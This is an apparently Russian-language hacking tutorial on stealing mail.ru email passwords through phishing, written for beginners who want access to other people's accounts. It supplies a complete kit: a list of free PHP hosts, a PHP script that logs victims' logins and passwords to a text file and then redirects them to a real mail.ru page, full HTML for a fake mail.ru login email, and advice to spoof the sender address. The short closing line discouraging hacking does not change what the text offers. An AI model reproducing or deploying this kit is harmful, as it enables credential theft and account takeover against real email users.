|
Взлом почты на mail.ru [СИ]
Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику, сами поймете.
Статья сгодится для новичков. Гуру просьба не читать :)
Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
* Только заранее убедитесь что хостинг поддерживает PHP
Можно зарегистрироваться на любом из этих:
nextmail.ru hobby.ru webrise.ru lapin.ru free.dl-hosting.ru hostow.net beplaced.ru 777host.ru paltus.ru miraclehost.ru freebox.ru alfaspace.net k70.ru hosting.promostudio.ru chat.ru maxhost.ru nixup.com e2e.ru noka.ru newmail.ru boom.ru h15.ru hut.ru jino-net.ru pochta.ru unlimhost.ru onepage.ru by.ru sbn.bz yard.ru domainhosting.ru orthodoxy.ru webservis.ru ru-web.net activehost.ru househost.ru bestof.ru addr.ru hosting.dump.ru pesni.ru medbox.ru fatal.ru x5x.ru hopshot.com 5gigs.com wagoo.com orgfree.com awardspace.com bobos.ca www.host.sk zportal.info spaceall.de 3x.ro sretenie.ru dotgeek.org sevhosting.net o2g.net www.jino-net.ru www.nixup.com newmail.ru ho.com.ua wallSt.ru hut.ru holm.ru e2e.ru fatal.ru host.sk ut.ru H1.ru Hostmos.ru Webm.ru Rdcom.ru narod.ru front.ru nm.ru chat.ru boom.ru by.ru
Зарегистрировали? - идем дальше!
Что нам нужно?
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл).
PHP Код:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранятьflock($f,2);fputs($f,$_GET['Login']."@"); #логинfputs($f,$_GET['Domain']); #доменfputs($f,";".$_GET['Password']."\n"); # парольflock($f,3);fclose($f);?><script>document.location.href="/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Рассмотрим скрипт поподробнее.
PHP Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.
- Сохраним в файл mes.php и зальем на хостинг.
- Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777.
Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код Письма:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr> <td id=aj_body> <div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"> <table cellpadding=0 cellspacing=0 border=0 class=login> <tr> <td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td> </tr> </table><font color=00;33;66 FACE="Arial" > <h4 >Авторизация</h4> </font> <table cellpadding=0 cellspacing=0 border=0 class=login> <form method="GET" action="http://адресссайта/mes.php"> <input type="hidden" name="mail" value="1"> <tr> <td width=75> <img src=http://img.mail.ru/0.gif height=1><br>Имя </td> <td width=150> <input type="text" name="Login"> </td> <td width=75> <select name="Domain"> <option value="mail.ru" SELECTED>@mail.ru</option> <option value="inbox.ru">@inbox.ru</option> <option value="list.ru" >@list.ru</option> <option value="bk.ru" >@bk.ru</option> </select> </td> </tr> <tr> <td> Пароль </td> <td> <input type="password" name="Password"> </td> <td> <a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a> </td> </tr> <tr> <td> </td> <td> <input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label> </td> <td> </td> </tr> <tr> <td> </td> <td> <input type="Submit" value=" Войти " xstyle="margin-top:4px"> </td> <td> </td> </tr></form> </table><br><br> Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br> Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта. <base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>
Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адреса.
Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло :)
Узнать пароли вы сможете в файлике mail.txt.
Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов чуть ниже этого текста.
А лучше уж ничего и никого не ломать ;)
До свидания и до встречи :)
Дата створення/оновлення: 25.05.2018